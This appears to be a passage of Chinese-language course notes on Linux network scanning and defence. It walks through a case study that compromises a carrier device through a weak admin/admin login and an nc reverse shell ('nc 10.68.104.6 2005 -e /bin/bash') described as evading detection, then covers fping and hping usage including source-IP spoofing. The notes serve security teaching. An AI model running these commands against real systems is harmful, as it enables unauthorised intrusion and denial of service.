Linux系统扫描技术及其安全防范

网络安全技术>>互联网安全：保障数据在互联网的真实、可靠、完整、可控性传输与存储。真实：数据是原数据，而不是别人发的；可靠：数据是安全的，没有被篡改；完整：数据没有丢失；可控：数据可以被自己加密。

一个典型的网络安全事件，案例：通过网络扫描方式获取某运营商核心设备的管理权限

      ⑴：通过tracert路由跟踪一个公网地址，发现有走内网的核心设备转发。

          在Windows下的CMD输入

           tracert www.jd.com       可以得到当前IP至目标服务器的路由路径

      ⑵：通过端口范围扫描nmap，得知开发了80（http）、23（telnet）端口

          nmap用作批量主机服务扫描

      ⑶：尝试进行暴力破解，发现登陆http://10.202.4.73

          可以用弱口令进行登陆（admin、admin）

      ⑷：登陆到管理界面后，尝试用nc命令进行交互式shell操作（创建后门）

          ①、黑客电脑CMD上  nc -lvp 2005

              黑客监听自己的2005端口

          ②、登陆后在服务器上 nc 10.68.104.6 2005 -e /bin/bash

              将/bin/bash环境传给黑客IP的2005端口

              黑客可以在自己的CMD下使用Linux命令

              优点：不会频繁通过界面登陆留下痕迹

                    登陆非常方便

                    不会被侦听设备侦测到

      ⑸：可以进行任意的操作

      ⑹：总结：

          ①、网络入侵方式

              踩点（判断攻击目标）→网络扫描（分析弱点）→查点（尝试破解）→提权

          ②、tracert  nmap  nc  命令的使用

课程意义：了解互联网安全领域中日趋重要的扫描技术；了解不同网络场景下扫描技术的手段；熟悉Linux下系统内核防护策略并能搭建一个有效的系统防护体系；增强工作安全意识，并能有效的实践自身的工作中。

 

一、主机扫描

⑴、fping工具

1、fping：批量的给目标主机发送ping请求，测试主机的存活情况

特点：并行发送（同时ping多台机器）、结果易读

 

插入新知识点：源码包编译过程（顺序由左至右，步骤由上至下）

编译方法             命令             产物（生成文件）

检测配置  →→→  ./configure   →→→   Makefile

↓                   ↓                 ↓

编译      →→→    make     →→→  二进制可执行文件

↓

安装      →→→   make install  →→→  安装到指定目录

 

2、fping安装步骤

①、获取下载源码包（http://fping.org/），复制源码包链接地址

②、在Linux命令下输入wget和粘贴地址 http://fping.org/dist/fping-3.10.tar.gz

③、解压缩：tar -xvf fping-3.10.tar.gz

④、ls      cd fping-3.10      #可以查看INSTALL  README 文件

⑤、./configure                #生成Makefile文件

⑥、make                       #编译

⑦、ls       make install      #查看、安装

⑧、ls /usr/local/sbin/fping   #查看是否安装成功

⑨、fping -h                   #查看命令帮助

    man fping

 

3、fping参数及使用

fping [选项]

       -a            #只显示存活的主机（相反选项-u）

通过标准输入方式  fping + ip1 + ip2

       -g            #支持主机段192.168.1.1-255段全部扫描

                      或者192.168.1.0/24      24为子网掩码

通过读取一个文件中IP内容

fping -f fliename

 

例如：fping 10.10.140.221 10.10.140.222        #扫描主机段

      fping -a 10.10.140.221 10.10.140.222     #扫描主机段只显示存活

      fping -a -g 10.10.140.1/24  #通过子网掩码（相当于扫描1-255主机段）

      fping -a -f ./ip_list.txt   #从文件中提取IP并扫描只显示存活主机

⑵、hping工具（特点：支持使用的TCP/IP数据包组装、分析工具）

1、下载地址:http://www.hping.org/

2、下载安装

   wget https://github.com/antirez/hping/archive/master.zip

   file master

   unzip master            #unzip注意 是否需要安装

   ls      cd hping-master/

   ./configure

   make

   apt-get install libpcap-devel或者yum install libpcap-devel  #安装依赖

   #依赖安装包下载安装地址（rpmfind.net  搜索源码包名称下载）

   rpm -ivh libpcap-devel-1.0.0-6.20091201git117cb5.el6.x86_64.rpm

   rpm -qa | grep pcap_devel        #查找是否安装成功

   cd hping-master/

   ./configure

   make

   ./hping3 -v                      #查看安装版本

   make install                     #安装成功

   hping -h                         #查看命令帮助

3、hping 常用参数

   ①、对特定目标端口发起tcp探测

       hping -p 端口              #对某个端口进行探测

       hping -S                   #发送TCP模式的SYN包（三次握手）

   ②、伪造来源IP，模拟DDOS攻击

       hping -a                   #伪造IP地址来源

   ③、示例：

       netstat -ltn    #-l监听、-ttcp协议、-n不做主机名解析，只显示IP地址

       sysctl -w net.ipv4.icmp_echo_ignore_all=1    

       #目标机通过内核拒绝ipv4协议对服务进行ping，那么普通ping和fping均会拼不通，而hping则可以通过TCP协议探测方式拼通（Windows下发送的是icmp包，而Linux下发送的是UDP包）

       hping -p 22 -S 10.10.163.233    #hping

       ping 10.10.163.233              #普通ping

       fping -u 10.10.163.233          #fping

 

       目标服务器查询网卡监听的数据包

       tcpdump -np -ieth0

       tcpdump -np -ieth0 src host 10.10.163.232    

       #目标机器过滤只看这个IP的监听，进行抓包监听

       hping -p 22 -S 10.10.163.233 -a 10.10.163.235   

       #攻击机伪造IP进行请求

       tcpdump -np -ieth0 src host 10.10.163.232

       #再次抓包看到没有数据包请求

       tcpdump -np -ieth0 src host 10.10.163.235

       #看到了这个IP的数据包请求，证明攻击机伪造IP成功

 

二、路由扫描：查询一个主机到另一个主机经过的路由的跳数、数据延迟的情况

⑴、traceroute工具

    ①、tracerout工作原理